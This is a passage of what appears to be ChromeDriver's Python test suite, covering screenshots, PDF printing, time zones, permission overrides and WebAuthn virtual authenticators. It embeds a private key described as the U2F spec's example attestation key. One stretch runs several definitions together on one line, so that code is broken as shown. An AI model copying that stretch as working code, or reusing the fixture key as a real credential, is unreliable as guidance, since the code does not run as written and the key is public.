    self.assertEquals('11', value_display.GetText())

  def testSlowIFrame(self):
    """Verify ChromeDriver does not wait for slow frames to load.

    Regression test for bugs
    https://bugs.chromium.org/p/chromedriver/issues/detail?id=2198 and
    https://bugs.chromium.org/p/chromedriver/issues/detail?id=2350.
    """
    def waitAndRespond():
      # Send iframe contents slowly
      time.sleep(2)
      self._sync_server.RespondWithContent(
          '<html><div id=iframediv>IFrame contents</div></html>')
    self._http_server.SetDataForPath('/top.html',
        """
        <html><body>
        <div id='top'>
          <input id='button' type="button" onclick="run()" value='Click'>
        </div>
        <script>
        function run() {
          var iframe = document.createElement('iframe');
          iframe.id = 'iframe';
          iframe.setAttribute('src', '%s');
          document.body.appendChild(iframe);
        }
        </script>
        </body></html>""" % self._sync_server.GetUrl())
    self._driver.Load(self._http_server.GetUrl() + '/top.html')
    thread = threading.Thread(target=waitAndRespond)
    thread.start()
    start = monotonic()
    # Click should not wait for frame to load, so elapsed time from this
    # command should be < 2 seconds.
    self._driver.FindElement('css selector', '#button').Click()
    self.assertLess(monotonic() - start, 2.0)
    frame = self._driver.FindElement('css selector', '#iframe')
    # WaitForPendingNavigations examines the load state of the current frame
    # so ChromeDriver will wait for frame to load after SwitchToFrame
    # start is reused because that began the pause for the frame load
    self._driver.SwitchToFrame(frame)
    self.assertGreaterEqual(monotonic() - start, 2.0)
    self._driver.FindElement('css selector', '#iframediv')
    thread.join()

  @staticmethod
  def MakeRedImageTestScript(png_data_in_base64):
    """Used by the takeElementScreenshot* tests to load the PNG image via a
    data URI, analyze it, and PASS/FAIL depending on whether all the pixels
    are all rgb(255,0,0)."""
    return (
        """
        const resolve = arguments[arguments.length - 1];
        const image = new Image();
        image.onload = () => {
          var canvas = document.createElement('canvas');
          canvas.width = image.width;
          canvas.height = image.height;
          var context = canvas.getContext('2d');
          context.drawImage(image, 0, 0);
          const pixels =
              context.getImageData(0, 0, image.width, image.height).data;
          for (let i = 0; i < pixels.length; i += 4) {
            if (pixels[i + 0] != 255 ||  // Red
                pixels[i + 1] != 0 ||    // Green
                pixels[i + 2] != 0) {    // Blue
              const message = (
                  'FAIL: Bad pixel rgb(' + pixels.slice(i, i + 3).join(',') +
                  ') at offset ' + i + ' from ' + image.src);
              // "Disabled" on Mac 10.10: 1/15 test runs produces an incorrect
              // pixel. Since no later Mac version, nor any other platform,
              // exhibits this problem, we assume this is due to a bug in this
              // specific version of Mac OS. So, just log the error and pass
              // the test. http://crbug.com/913603
              if (navigator.userAgent.indexOf('Mac OS X 10_10') != -1) {
                console.error(message);
                console.error('Passing test due to Mac 10.10-specific bug.');
                resolve('PASS');
              } else {
                resolve(message);
              }
              return;
            }
          }
          resolve('PASS');
        };
        image.src = 'data:image/png;base64,%s';
        """ % png_data_in_base64.replace("'", "\\'"))

  def takeScreenshotAndVerifyCorrect(self, element):
    """ Takes screenshot of given element and returns 'PASS' if all pixels
        in screenshot are rgb(255, 0, 0) and 'FAIL' otherwise """
    elementScreenshotPNGBase64 = element.TakeElementScreenshot()
    self.assertIsNotNone(elementScreenshotPNGBase64)
    return self._driver.ExecuteAsyncScript(
        ChromeDriverTest.MakeRedImageTestScript(elementScreenshotPNGBase64))

  def testTakeElementScreenshot(self):
    """Verifies an element screenshot captures only the all-red element."""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/page_with_redbox.html'))
    analysisResult = 'FAIL'
    redElement = self._driver.FindElement('css selector', '#box')
    analysisResult = self.takeScreenshotAndVerifyCorrect(redElement)
    self.assertEquals('PASS', analysisResult)

  def testTakeElementScreenshotInIframe(self):
    """Verifies element screenshots work for elements inside an iframe."""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/page_with_iframe_redbox.html'))
    frame = self._driver.FindElement('css selector', '#frm')
    self._driver.SwitchToFrame(frame)
    analysisResult = 'FAIL'
    redElement = self._driver.FindElement('css selector', '#box')
    analysisResult = self.takeScreenshotAndVerifyCorrect(redElement)
    self.assertEquals('PASS', analysisResult)

  def testTakeLargeElementScreenshot(self):
    """Verifies screenshots of elements larger than the viewport."""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/large_element.html'))
    self._driver.SetWindowRect(500, 500, 0, 0)
    # Wait for page to stabilize. See https://crbug.com/chromedriver/2986
    time.sleep(1)
    redElement = self._driver.FindElement('css selector', '#A')
    analysisResult = self.takeScreenshotAndVerifyCorrect(redElement)
    self.assertEquals('PASS', analysisResult)

  @staticmethod
  def png_dimensions(png_data_in_base64):
    # Width and height live at bytes 16-23 of the PNG IHDR chunk,
    # big-endian 32-bit each.
    image = base64.b64decode(png_data_in_base64)
    width, height = struct.unpack('>LL', image[16:24])
    return int(width), int(height)

  def testTakeLargeElementViewportScreenshot(self):
    """Verifies a viewport screenshot matches the viewport size in
    physical pixels."""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/large_element.html'))
    self._driver.SetWindowRect(640, 400, 0, 0)
    # Wait for page to stabilize. See https://crbug.com/chromedriver/2986
    time.sleep(1)
    viewportScreenshotPNGBase64 = self._driver.TakeScreenshot()
    self.assertIsNotNone(viewportScreenshotPNGBase64)
    mime_type = imghdr.what('', base64.b64decode(viewportScreenshotPNGBase64))
    self.assertEqual('png', mime_type)
    image_width, image_height = self.png_dimensions(viewportScreenshotPNGBase64)
    viewport_width, viewport_height = self._driver.ExecuteScript(
        '''
        const {devicePixelRatio, innerHeight, innerWidth} = window;
        return [
          Math.floor(innerWidth * devicePixelRatio),
          Math.floor(innerHeight * devicePixelRatio)
        ];
        ''')
    self.assertEquals(image_width, viewport_width)
    self.assertEquals(image_height, viewport_height)

  def testTakeLargeElementFullPageScreenshot(self):
    """Verifies a full-page screenshot covers the whole document, not just
    the viewport, and leaves the window size untouched."""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/large_element.html'))
    width = 640
    height = 400
    self._driver.SetWindowRect(width, height, 0, 0)
    # Wait for page to stabilize. See https://crbug.com/chromedriver/2986
    time.sleep(1)
    fullpageScreenshotPNGBase64 = self._driver.TakeFullPageScreenshot()
    self.assertIsNotNone(fullpageScreenshotPNGBase64)
    mime_type = imghdr.what('', base64.b64decode(fullpageScreenshotPNGBase64))
    self.assertEqual('png', mime_type)
    image_width, image_height = self.png_dimensions(fullpageScreenshotPNGBase64)
    # According to https://javascript.info/size-and-scroll-window,
    # width/height of the whole document, with the scrolled out part
    page_width, page_height = self._driver.ExecuteScript(
        '''
        const body = document.body;
        const doc = document.documentElement;
        const width = Math.max(body.scrollWidth, body.offsetWidth,\
                               body.clientWidth, doc.scrollWidth,\
                               doc.offsetWidth, doc.clientWidth);
        const height = Math.max(body.scrollHeight, body.offsetHeight,\
                                body.clientHeight, doc.scrollHeight,\
                                doc.offsetHeight, doc.clientHeight);
        return [
          width,
          height
        ];
        ''')
    self.assertEquals(image_width, page_width)
    self.assertEquals(image_height, page_height)
    # Assert Window Rect size stay the same after taking fullpage screenshot
    size = self._driver.GetWindowRect()
    self.assertEquals(size[0], width)
    self.assertEquals(size[1], height)
    # Verify scroll bars presence after test
    horizontal_scroll_bar, vertical_scroll_bar = self._driver.ExecuteScript(
        '''
        const doc = document.documentElement;
        return [
          doc.scrollWidth > doc.clientWidth,
          doc.scrollHeight > doc.clientHeight
        ];
        ''')
    self.assertEquals(horizontal_scroll_bar, True)
    self.assertEquals(vertical_scroll_bar, True)

  def testPrint(self):
    """Verifies PrintPDF accepts a full option set and returns a PDF."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    pdf = self._driver.PrintPDF({
        'orientation': 'landscape',
        'scale': 1.1,
        'margin': {
            'top': 1.1,
            'bottom': 2.2,
            'left': 3.3,
            'right': 4.4
        },
        'background': True,
        'shrinkToFit': False,
        'pageRanges': [1],
        'page': {
            'width': 15.6,
            'height': 20.6
        }
    })
    decoded_pdf = base64.b64decode(pdf)
    # A PDF document starts with "%PDF" and ends with "%%EOF".
    self.assertTrue(decoded_pdf.startswith("%PDF"))
    self.assertTrue(decoded_pdf.endswith("%%EOF"))

  def testPrintInvalidArgument(self):
    """Verifies a malformed pageRanges value raises InvalidArgument."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self.assertRaises(chromedriver.InvalidArgument,
                      self._driver.PrintPDF, {'pageRanges': ['x-y']})

  def testGenerateTestReport(self):
    """Verifies GenerateTestReport delivers a report to a ReportingObserver
    registered by the page."""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/reporting_observer.html'))
    self._driver.GenerateTestReport('test report message');
    report = self._driver.ExecuteScript('return window.result;')
    self.assertEquals('test', report['type']);
    self.assertEquals('test report message', report['body']['message']);

  def testSetTimeZone(self):
    """Verifies SetTimeZone changes the renderer's effective time zone."""
    defaultTimeZoneScript = '''
        return (new Intl.DateTimeFormat()).resolvedOptions().timeZone;
        ''';
    localHourScript = '''
        return (new Date("2020-10-10T00:00:00Z")).getHours();
        ''';
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    # Test to switch to Taipei
    self._driver.SetTimeZone('Asia/Taipei');
    timeZone = self._driver.ExecuteScript(defaultTimeZoneScript)
    self.assertEquals('Asia/Taipei', timeZone);
    localHour = self._driver.ExecuteScript(localHourScript)
    # Taipei time is GMT+8. Not observes DST.
    self.assertEquals(8, localHour);
    # Test to switch to Tokyo
    self._driver.SetTimeZone('Asia/Tokyo');
    timeZone = self._driver.ExecuteScript(defaultTimeZoneScript)
    self.assertEquals('Asia/Tokyo', timeZone);
    localHour = self._driver.ExecuteScript(localHourScript)
    # Tokyo time is GMT+9. Not observes DST.
    self.assertEquals(9, localHour);

  def GetPermissionWithQuery(self, query):
    """Returns the state of *query* via navigator.permissions.query.

    The result is a dict {'status': 'success'|'error', 'value': state|msg}.
    """
    script = """
        let query = arguments[0];
        let done = arguments[1];
        console.log(done);
        navigator.permissions.query(query)
          .then(function(value) {
              done({ status: 'success', value: value && value.state });
            }, function(error) {
              done({ status: 'error', value: error && error.message });
            });
    """
    return self._driver.ExecuteAsyncScript(script, query)

  def GetPermission(self, name):
    # Convenience wrapper for permissions identified by name only.
    return self.GetPermissionWithQuery({ 'name': name })

  def CheckPermission(self, response, expected_state):
    # Asserts the query succeeded and reported the expected state.
    self.assertEquals(response['status'], 'success')
    self.assertEquals(response['value'], expected_state)

  def testPermissionsOpaqueOriginsThrowError(self):
    """ Confirms that opaque origins cannot have overrides. """
    self._driver.Load("about:blank")
    self.assertRaises(chromedriver.InvalidArgument,
                      self._driver.SetPermission,
                      {'descriptor': { 'name': 'geolocation' },
                       'state': 'denied'})

  def testPermissionStates(self):
    """ Confirms that denied, granted, and prompt can be set. """
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.SetPermission({
      'descriptor': { 'name': 'geolocation' },
      'state': 'denied'
    })
    self.CheckPermission(self.GetPermission('geolocation'), 'denied')
    self._driver.SetPermission({
      'descriptor': { 'name': 'geolocation' },
      'state': 'granted'
    })
    self.CheckPermission(self.GetPermission('geolocation'), 'granted')
    self._driver.SetPermission({
      'descriptor': { 'name': 'geolocation' },
      'state': 'prompt'
    })
    self.CheckPermission(self.GetPermission('geolocation'), 'prompt')

  def testSettingPermissionDoesNotAffectOthers(self):
    """ Confirm permissions do not affect unset permissions. """
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    # Record geolocation's current state before touching anything else.
    response = self.GetPermission('geolocation')
    self.assertEquals(response['status'], 'success')
    status = response['value']
    self._driver.SetPermission({
      'descriptor': { 'name': 'background-sync' },
      'state': 'denied'
    })
    self.CheckPermission(self.GetPermission('background-sync'), 'denied')
    # Geolocation must be unchanged.
    self.CheckPermission(self.GetPermission('geolocation'), status)

  def testMultiplePermissions(self):
    """ Confirms multiple custom permissions can be set simultaneously. """
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.SetPermission({
      'descriptor': { 'name': 'geolocation' },
      'state': 'denied'
    })
    self._driver.SetPermission({
      'descriptor': { 'name': 'background-fetch' },
      'state': 'prompt'
    })
    self._driver.SetPermission({
      'descriptor': { 'name': 'background-sync' },
      'state': 'granted'
    })
    self.CheckPermission(self.GetPermission('geolocation'), 'denied')
    self.CheckPermission(self.GetPermission('background-fetch'), 'prompt')
    self.CheckPermission(self.GetPermission('background-sync'), 'granted')

  def testSensorPermissions(self):
    """ Tests sensor permissions.

    Currently, Chrome controls all sensor permissions (accelerometer,
    magnetometer, gyroscope, ambient-light-sensor) with the 'sensors'
    permission. This test demonstrates this internal implementation detail
    so developers are aware of this behavior.
    """
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    parameters = { 'descriptor': { 'name': 'magnetometer' },
                   'state': 'granted' }
    self._driver.SetPermission(parameters)
    # Light sensor is not enabled by default, so it cannot be queried or set.
    #self.CheckPermission(self.GetPermission('ambient-light-sensor'),
    #                     'granted')
    self.CheckPermission(self.GetPermission('magnetometer'), 'granted')
    self.CheckPermission(self.GetPermission('accelerometer'), 'granted')
    self.CheckPermission(self.GetPermission('gyroscope'), 'granted')
    # Denying any one sensor denies the shared 'sensors' permission.
    parameters = { 'descriptor': { 'name': 'gyroscope' },
                   'state': 'denied' }
    self._driver.SetPermission(parameters)
    #self.CheckPermission(self.GetPermission('ambient-light-sensor'),
    #                     'denied')
    self.CheckPermission(self.GetPermission('magnetometer'), 'denied')
    self.CheckPermission(self.GetPermission('accelerometer'), 'denied')
    self.CheckPermission(self.GetPermission('gyroscope'), 'denied')

  def testMidiPermissions(self):
    """ Tests midi permission requirements.

    MIDI, sysex: true, when granted, should automatically grant regular
    MIDI permissions.
    When regular MIDI is denied, this should also imply MIDI with sysex is
    denied.
    """
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    parameters = { 'descriptor': { 'name': 'midi', 'sysex': True },
                   'state': 'granted' }
    self._driver.SetPermission(parameters)
    self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']),
                         'granted')
    # Granting sysex MIDI implies regular MIDI is granted too.
    parameters['descriptor']['sysex'] = False
    self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']),
                         'granted')
    parameters = { 'descriptor': { 'name': 'midi', 'sysex': False },
                   'state': 'denied' }
    self._driver.SetPermission(parameters)
    self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']),
                         'denied')
    # While this should be denied, Chrome does not do this.
    # parameters['descriptor']['sysex'] = True should be denied.

  def testClipboardPermissions(self):
    """ Tests clipboard permission requirements.

    clipboard-read with allowWithoutSanitization: true or false, and
    clipboard-write with allowWithoutSanitization: true are bundled together
    into one CLIPBOARD_READ_WRITE permission.
    clipboard write with allowWithoutSanitization: false is an auto-granted
    permission.
    """
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    parameters = { 'descriptor': { 'name': 'clipboard-read' ,
                                   'allowWithoutSanitization': False },
                   'state': 'granted' }
    raw_write_parameters = { 'descriptor':
                             { 'name': 'clipboard-write',
                               'allowWithoutSanitization': True } }
    # Both bundled permissions start out at 'prompt'.
    self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']),
                         'prompt')
    self.CheckPermission(self.GetPermissionWithQuery(
        raw_write_parameters['descriptor']), 'prompt')
    self._driver.SetPermission(parameters)
    self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']),
                         'granted')
    # Granting sanitized read also grants raw read and raw write, since they
    # share the CLIPBOARD_READ_WRITE permission.
    parameters['descriptor']['allowWithoutSanitization'] = True
    self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']),
                         'granted')
    parameters['descriptor']['name'] = 'clipboard-write'
    self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']),
                         'granted')
    # Sanitized clipboard-write is tracked separately.
    parameters = { 'descriptor': { 'name': 'clipboard-write' },
                   'state': 'prompt' }
    self._driver.SetPermission(parameters)
    self.CheckPermission(self.GetPermission('clipboard-read'), 'granted')
    self.CheckPermission(self.GetPermission('clipboard-write'), 'prompt')

  def testPersistentStoragePermissions(self):
    """Verifies persistent-storage can be granted and denied."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    parameters = { 'descriptor': { 'name': 'persistent-storage' },
                   'state': 'granted' }
    self._driver.SetPermission(parameters)
    self.CheckPermission(self.GetPermission('persistent-storage'), 'granted')
    parameters['state'] = 'denied'
    self._driver.SetPermission(parameters)
    self.CheckPermission(self.GetPermission('persistent-storage'), 'denied')

  def testPushAndNotificationsPermissions(self):
    """Verifies notifications and user-visible push share one permission."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    parameters = { 'descriptor': { 'name': 'notifications' },
                   'state': 'granted' }
    push_descriptor = { 'name': 'push', 'userVisibleOnly': True }
    self._driver.SetPermission(parameters)
    self.CheckPermission(self.GetPermission('notifications'), 'granted')
    self.CheckPermission(self.GetPermissionWithQuery(push_descriptor),
                         'granted')
    parameters['state'] = 'denied'
    self._driver.SetPermission(parameters)
    self.CheckPermission(self.GetPermission('notifications'), 'denied')
    self.CheckPermission(self.GetPermissionWithQuery(push_descriptor),
                         'denied')
    # Push without userVisibleOnly is not a supported override target.
    push_descriptor['userVisibleOnly'] = False
    parameters = { 'descriptor': push_descriptor, 'state': 'prompt' }
    self.assertRaises(chromedriver.InvalidArgument,
                      self._driver.SetPermission, parameters)

  def testPermissionsSameOrigin(self):
    """ Assures permissions are shared between same-domain windows. """
    window_handle = self._driver.NewWindow()['handle']
    self._driver.SwitchToWindow(window_handle)
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html'))
    another_window_handle = self._driver.NewWindow()['handle']
    self._driver.SwitchToWindow(another_window_handle)
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    # Set permission.
    parameters = { 'descriptor': { 'name': 'geolocation' },
                   'state': 'granted' }
    # Test that they are present across the same domain.
    self._driver.SetPermission(parameters)
    self.CheckPermission(self.GetPermission('geolocation'), 'granted')
    self._driver.SwitchToWindow(window_handle)
    self.CheckPermission(self.GetPermission('geolocation'), 'granted')

  def testNewWindowSameDomainHasSamePermissions(self):
    """ Assures permissions are shared between same-domain windows, even
    when window is created after permissions are set.
    """
    window_handle = self._driver.NewWindow()['handle']
    self._driver.SwitchToWindow(window_handle)
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.SetPermission({ 'descriptor': { 'name': 'geolocation' },
                                 'state': 'denied' })
    self.CheckPermission(self.GetPermission('geolocation'), 'denied')
    # A window opened afterwards on the same domain sees the same override.
    same_domain = self._driver.NewWindow()['handle']
    self._driver.SwitchToWindow(same_domain)
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html'))
    self.CheckPermission(self.GetPermission('geolocation'), 'denied')

  def testPermissionsSameOriginDoesNotAffectOthers(self):
    """ Tests whether permissions set between two domains affect others. """
    window_handle = self._driver.NewWindow()['handle']
    self._driver.SwitchToWindow(window_handle)
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html'))
    another_window_handle = self._driver.NewWindow()['handle']
    self._driver.SwitchToWindow(another_window_handle)
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    different_domain = self._driver.NewWindow()['handle']
    self._driver.SwitchToWindow(different_domain)
    self._driver.Load('https://google.com')
    self._driver.SetPermission({ 'descriptor': {'name': 'geolocation'},
                                 'state': 'denied' })
    # Switch for permissions.
    self._driver.SwitchToWindow(another_window_handle)
    # Set permission.
    parameters = { 'descriptor': { 'name': 'geolocation' },
                   'state': 'prompt' }
    # Test that they are present across the same domain.
    self._driver.SetPermission(parameters)
    self.CheckPermission(self.GetPermission('geolocation'), 'prompt')
    self._driver.SwitchToWindow(window_handle)
    self.CheckPermission(self.GetPermission('geolocation'), 'prompt')
    # Assert different domain is not the same.
    self._driver.SwitchToWindow(different_domain)
    self.CheckPermission(self.GetPermission('geolocation'), 'denied')

  # Tests that the webauthn capabilities are true on desktop and false on
  # android.
def testWebauthnVirtualAuthenticatorsCapability(self): is_desktop = _ANDROID_PACKAGE_KEY is None self.assertEqual( is_desktop, self._driver.capabilities['webauthn:virtualAuthenticators']) self.assertEqual( is_desktop, self._driver.capabilities['webauthn:extension:largeBlob']) class ChromeDriverBackgroundTest(ChromeDriverBaseTestWithWebServer): def setUp(self): self._driver1 = self.CreateDriver() self._driver2 = self.CreateDriver() def testBackgroundScreenshot(self): self._driver2.Load(self._http_server.GetUrl('localhost') + '/chromedriver/empty.html') self._driver1.Load(self._http_server.GetUrl('localhost') + '/chromedriver/empty.html') screenshotPNGBase64 = self._driver1.TakeScreenshot() self.assertIsNotNone(screenshotPNGBase64) # Tests that require a secure context. class ChromeDriverSecureContextTest(ChromeDriverBaseTestWithWebServer): # The example attestation private key from the U2F spec at # https://fidoalliance.org/specs/fido-u2f-v1.2-ps-20170411/fido-u2f-raw-message-formats-v1.2-ps-20170411.html#registration-example # PKCS.8 encoded without encryption, as a base64url string. privateKey = ("MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQg8_zMDQDYAxlU-Q" "hk1Dwkf0v18GZca1DMF3SaJ9HPdmShRANCAASNYX5lyVCOZLzFZzrIKmeZ2jwU" "RmgsJYxGP__fWN_S-j5sN4tT15XEpN_7QZnt14YvI6uvAgO0uJEboFaZlOEB") @staticmethod def GetHttpsUrlForFile(file_path, host=None): return ChromeDriverSecureContextTest._https_server.GetUrl( host) + file_path # Encodes a string in URL-safe base64 with no padding. @staticmethod def URLSafeBase64Encode(string): encoded = base64.urlsafe_b64encode(string) while encoded[-1] == "=": encoded = encoded[0:-1] return encoded # Decodes a base64 string with no padding. 
  @staticmethod
  def UrlSafeBase64Decode(string):
    string = string.encode("utf-8")
    # Restore the padding stripped by URLSafeBase64Encode.
    if len(string) % 4 != 0:
      string += "=" * (4 - len(string) % 4)
    return base64.urlsafe_b64decode(string)

  def setUp(self):
    # Map every host to localhost so 'chromedriver.test' resolves, and turn
    # on experimental web platform features for WebAuthn extensions.
    self._driver = self.CreateDriver(
        accept_insecure_certs=True,
        chrome_switches=['host-resolver-rules=MAP * 127.0.0.1',
                         'enable-experimental-web-platform-features'])

  def testAddVirtualAuthenticator(self):
    """Verifies registration succeeds on a fully-featured virtual
    authenticator with the largeBlob extension."""
    script = """
      let done = arguments[0];
      registerCredential({
        authenticatorSelection: {
          requireResidentKey: true,
        },
        extensions: {
          largeBlob: {
            support: 'preferred',
          },
        },
      }).then(done);
    """
    self._driver.Load(self.GetHttpsUrlForFile(
        '/chromedriver/webauthn_test.html', 'chromedriver.test'))
    self._driver.AddVirtualAuthenticator(
        protocol = 'ctap2_1',
        transport = 'usb',
        hasResidentKey = True,
        hasUserVerification = True,
        isUserConsenting = True,
        isUserVerified = True,
        extensions = ['largeBlob']
    )
    result = self._driver.ExecuteAsyncScript(script)
    self.assertEquals('OK', result['status'])
    self.assertEquals(['usb'], result['credential']['transports'])
    self.assertEquals(True, result['extensions']['largeBlob']['supported'])

  def testAddVirtualAuthenticatorProtocolVersion(self):
    """Verifies all supported protocol strings and rejection of unknown
    ones."""
    self._driver.Load(self.GetHttpsUrlForFile(
        '/chromedriver/webauthn_test.html', 'chromedriver.test'))
    for protocol in ['ctap1/u2f', 'ctap2', 'ctap2_1']:
      authenticator_id = self._driver.AddVirtualAuthenticator(
          protocol = protocol,
          transport = 'usb',
      )
      self.assertTrue(len(authenticator_id) > 0)
    self.assertRaisesRegexp(
        chromedriver.UnsupportedOperation,
        'INVALID is not a recognized protocol version',
        self._driver.AddVirtualAuthenticator,
        protocol = 'INVALID',
        transport = 'usb')

  def testAddVirtualBadExtensions(self):
    """Verifies malformed or unknown extension lists are rejected."""
    self.assertRaisesRegexp(
        chromedriver.InvalidArgument,
        'extensions must be a list of strings',
        self._driver.AddVirtualAuthenticator,
        protocol = 'ctap2',
        transport = 'usb',
        extensions = 'invalid')
    self.assertRaisesRegexp(
        chromedriver.InvalidArgument,
        'extensions must be a list of strings',
        self._driver.AddVirtualAuthenticator,
        protocol = 'ctap2',
        transport = 'usb',
        extensions = [42])
    self.assertRaisesRegexp(
        chromedriver.UnsupportedOperation,
        'smolBlowbs is not a recognized extension',
        self._driver.AddVirtualAuthenticator,
        protocol = 'ctap2',
        transport = 'usb',
        extensions = ['smolBlowbs'])

  def testAddVirtualAuthenticatorDefaultParams(self):
    """Verifies only protocol and transport are required parameters."""
    script = """
      let done = arguments[0];
      registerCredential().then(done);
    """
    self._driver.Load(self.GetHttpsUrlForFile(
        '/chromedriver/webauthn_test.html', 'chromedriver.test'))
    self._driver.AddVirtualAuthenticator(
        protocol = 'ctap1/u2f',
        transport = 'usb',
    )
    result = self._driver.ExecuteAsyncScript(script)
    self.assertEquals('OK', result['status'])
    self.assertEquals(['usb'], result['credential']['transports'])

  def testRemoveVirtualAuthenticator(self):
    """Verifies RemoveVirtualAuthenticator and its error cases."""
    self._driver.Load(self.GetHttpsUrlForFile(
        '/chromedriver/webauthn_test.html', 'chromedriver.test'))
    # Removing a non existent virtual authenticator should fail.
    self.assertRaisesRegexp(
        chromedriver.InvalidArgument,
        'Could not find a Virtual Authenticator matching the ID',
        self._driver.RemoveVirtualAuthenticator, 'id')
    # Create an authenticator and try removing it.
    authenticatorId = self._driver.AddVirtualAuthenticator(
        protocol = 'ctap2',
        transport = 'usb',
        hasResidentKey = False,
        hasUserVerification = False,
    )
    self._driver.RemoveVirtualAuthenticator(authenticatorId)
    # Trying to remove the same authenticator should fail.
    self.assertRaisesRegexp(
        chromedriver.InvalidArgument,
        'Could not find a Virtual Authenticator matching the ID',
        self._driver.RemoveVirtualAuthenticator, authenticatorId)

  def testAddCredential(self):
    """Verifies a credential injected via AddCredential can be used to
    authenticate."""
    script = """
      let done = arguments[0];
      getCredential({
        type: "public-key",
        id: new TextEncoder().encode("cred-1"),
        transports: ["usb"],
      }).then(done);
    """
    self._driver.Load(self.GetHttpsUrlForFile(
        '/chromedriver/webauthn_test.html', 'chromedriver.test'))
    authenticatorId = self._driver.AddVirtualAuthenticator(
        protocol = 'ctap2',
        transport = 'usb',
        hasResidentKey = False,
        hasUserVerification = False,
    )
    # Register a credential and try authenticating with it.
    self._driver.AddCredential(
      authenticatorId = authenticatorId,
      credentialId = self.URLSafeBase64Encode("cred-1"),
      isResidentCredential=False,
      rpId="chromedriver.test",
      privateKey=self.privateKey,
      signCount=1,
    )
    result = self._driver.ExecuteAsyncScript(script)
    self.assertEquals('OK', result['status'])

  def testAddCredentialLargeBlob(self):
    """Verifies a credential's large blob can be injected and read back via
    the largeBlob extension."""
    script = """
      let done = arguments[0];
      getCredential({
        type: "public-key",
        id: new TextEncoder().encode("cred-1"),
        transports: ["usb"],
      }, {
        extensions: {
          largeBlob: {
            read: true,
          },
        },
      }).then(done);
    """
    self._driver.Load(self.GetHttpsUrlForFile(
        '/chromedriver/webauthn_test.html', 'chromedriver.test'))
    authenticatorId = self._driver.AddVirtualAuthenticator(
        protocol = 'ctap2_1',
        transport = 'usb',
        hasResidentKey = True,
        hasUserVerification = True,
        isUserVerified = True,
        extensions = ['largeBlob']
    )
    # Register a credential with a large blob and try reading it.
    self._driver.AddCredential(
      authenticatorId = authenticatorId,
      credentialId = self.URLSafeBase64Encode('cred-1'),
      userHandle = self.URLSafeBase64Encode('erina'),
      largeBlob = self.URLSafeBase64Encode('large blob contents'),
      isResidentCredential = True,
      rpId = "chromedriver.test",
      privateKey = self.privateKey,
      signCount = 1,
    )
    result = self._driver.ExecuteAsyncScript(script)
    self.assertEquals('OK', result['status'])
    self.assertEquals('large blob contents', result['blob'])

  def testAddCredentialBase64Errors(self):
    # Test that AddCredential checks UrlBase64 parameteres.
    self._driver.Load(self.GetHttpsUrlForFile(
        '/chromedriver/webauthn_test.html', 'chromedriver.test'))
    authenticatorId = self._driver.AddVirtualAuthenticator(
        protocol = 'ctap2',
        transport = 'usb',
        hasResidentKey = False,
        hasUserVerification = False,
    )
    # Try adding a credentialId that is encoded in vanilla base64.
    self.assertRaisesRegexp(
        chromedriver.InvalidArgument,
        'credentialId must be a base64url encoded string',
        self._driver.AddCredential, authenticatorId, '_0n+wWqg=',
        False, "chromedriver.test", self.privateKey, None, 1,
    )
    # Try adding a credentialId that is not a string.
    self.assertRaisesRegexp(
        chromedriver.InvalidArgument,
        'credentialId must be a base64url encoded string',
        self._driver.AddCredential, authenticatorId, 1,
        False, "chromedriver.test", self.privateKey, None, 1,
    )

  def testGetCredentials(self):
    """Verifies GetCredentials reflects a credential created through the
    WebAuthn API, including its large blob."""
    script = """
      let done = arguments[0];
      registerCredential({
        authenticatorSelection: {
          requireResidentKey: true,
        },
        extensions: {
          largeBlob: {
            support: "required",
          },
        },
      }).then(attestation => getCredential({
        type: "public-key",
        id: Uint8Array.from(attestation.credential.rawId),
        transports: ["usb"],
      }, {
        extensions: {
          largeBlob: {
            write: new TextEncoder().encode("large blob contents"),
          },
        },
      })).then(done);
    """
    self._driver.Load(self.GetHttpsUrlForFile(
        '/chromedriver/webauthn_test.html', 'chromedriver.test'))
    authenticatorId = self._driver.AddVirtualAuthenticator(
        protocol = 'ctap2_1',
        transport = 'usb',
        hasResidentKey = True,
        hasUserVerification = True,
        isUserVerified = True,
        extensions = ['largeBlob']
    )
    # Register a credential via the webauthn API and set a large blob on it.
    result = self._driver.ExecuteAsyncScript(script)
    self.assertEquals('OK', result['status'])
    self.assertEquals(True, result['extensions']['largeBlob']['written'])
    credentialId = result['attestation']['id']
    # GetCredentials should return the credential that was just created.
    credentials = self._driver.GetCredentials(authenticatorId)
    self.assertEquals(1, len(credentials))
    self.assertEquals(credentialId, credentials[0]['credentialId'])
